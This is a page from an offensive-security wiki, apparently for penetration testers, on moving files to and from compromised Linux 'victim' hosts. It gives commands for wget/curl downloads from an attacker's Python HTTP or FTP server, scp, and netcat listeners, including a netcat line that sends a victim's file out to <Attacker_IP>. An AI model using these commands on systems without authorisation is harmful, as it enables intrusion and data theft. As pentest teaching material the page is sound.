Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  1. Transporting Files to/from Victims
  2. Transferring Files to/from High Value Targets

Linux

Uploading Files to Victims in Linux

1. Python Web Server

This method leverages Python’s built-in HTTP server functionality to quickly transfer files. It is useful when you're on a network and need to serve files over HTTP.

Attacking Machine Command:

python3 -m http.server 80

Victim Machine Command:

wget http://<Attacker_IP>/FileToTransfer:80

or

curl -o FileToTransfer http://<Attacker_IP>:80/FileToTransfer

Explanation: You start a simple HTTP server on your attacking machine (usually on port 80). On the victim's machine, they can download the file using wget or curl.

2. SCP (Secure Copy Protocol)

This method uses SSH to securely transfer files between systems. It is often used when SSH access to the victim machine is available.

Attacking Machine Command:

scp FileToTransfer tester@<Victim_IP>:/home/tester/iron/

Explanation: The attacking machine uses the scp command to securely copy a file to the victim machine’s specified directory.

3. Netcat

Netcat can be used as a simple and effective way to send files to a victim machine, leveraging its capability to listen for incoming connections and send data.

Victim Machine Command:

nc -lvp 4444 > FileToTransfer

Attacking Machine Command:

nc <Victim_IP> 4444 -w 3 < FileToTransfer

Explanation: On the victim’s machine, you set up nc to listen on port 4444 for incoming data, which gets written to a file. On the attacking machine, you pipe the file you want to send into nc, which sends it over the network to the victim.

4. FTP (File Transfer Protocol)

Using an FTP server allows for a more traditional file transfer protocol, but it might be slower or less stealthy compared to other methods like SCP or Netcat.

Attacking Machine Command:

twistd -n ftp -r .

Victim Machine Command:

wget ftp://<Attacker_IP>:2121/FileToTransfer

Explanation: On the attacking machine, you run an FTP server using twistd, which allows the victim to connect to it and download files. The victim can retrieve files using the wget command.

Downloading Victim Files in Linux

1. Python Web Server

You can quickly set up a Python HTTP server to serve files from the victim machine to the attacker.

Victim Machine Command:

python -m SimpleHTTPServer 8080

Attacking Machine Command:

wget http://<Victim_IP>:8080/FileToDownload

Explanation: The victim machine serves files over HTTP via Python’s built-in SimpleHTTPServer. The attacking machine can retrieve these files with wget.

2. Netcat

Netcat is just as effective for receiving files as it is for sending them. You can use it to listen for files being sent from the victim.

Attacking Machine Command:

nc -lvp 4444 > FileToDownload

Victim Machine Command:

nc <Attacker_IP> 4444 -w 3 < FileToDownload

Explanation: The attacker listens on port 4444 for incoming data and saves it as FileToDownload. The victim machine sends the file to the attacking machine using nc.

3. SCP (Secure Copy Protocol)

If you have SSH access to the victim machine, SCP is a secure and efficient way to download files.

Attacking Machine Command:

scp tester@<Victim_IP>:/home/tester/iron/FileToDownload .

Explanation: You use the scp command to securely copy a file from the victim machine to your local system, using SSH authentication.

PreviousTransferring Files to/from High Value TargetsNextWindows

Last updated 18 days ago